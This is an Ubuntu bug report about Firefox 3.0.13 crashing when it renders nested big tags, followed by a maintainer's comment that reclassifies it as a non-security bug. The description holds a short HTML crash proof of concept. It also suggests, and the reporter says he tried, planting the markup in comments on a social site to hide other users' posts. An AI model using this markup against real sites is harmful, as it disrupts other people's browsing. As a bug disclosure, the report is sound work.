mozilla firefox crashes on big format
| Affects | Status | Importance | Assigned to | Milestone | |
|---|---|---|---|---|---|
| firefox-3.0 (Ubuntu) |
Confirmed
|
Medium
|
Unassigned | ||
Bug Description
Binary package hint: firefox-3.0
mozilla firefox crashes on big format.
Proof of concept.You can restart the desktop just run this code in firefox:
-------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Bug D.O.S. Firefox 3.0.13 - by SnakingMax</title>
Author: David A.P. E-Mail:<email address hidden>
<big><big>
</body>
</html>
-------
A cracker can also make a comment, for example (I tried it), www.orkut.com and ensure that nobody can see the other comments. It's just an idea.
Regards,
David A.P
ProblemType: Bug
Architecture: i386
DistroRelease: Ubuntu 9.04
NonfreeKernelMo
Package: firefox-3.0 3.0.13+
ProcEnviron:
LANGUAGE=
LANG=es_ES.UTF-8
SHELL=/bin/bash
SourcePackage: firefox-3.0
Uname: Linux 2.6.28-15-generic i686
| snakingmax (snakingmax) wrote | #1 |
| Kees Cook (kees) wrote | #2 |
| visibility: | private → public |
| Changed in firefox-3.0 (Ubuntu): | |
| importance: | Undecided → Medium |
| status: | New → Confirmed |
| security vulnerability: | yes → no |
Thanks for taking the time to report this bug and helping to make Ubuntu better. In general, we don't usually treat local application crashes as security issues when there is no evidence of 3rd party control. I'm unsetting the security+private flags so that more developers will have a chance to review this bug. Thanks again!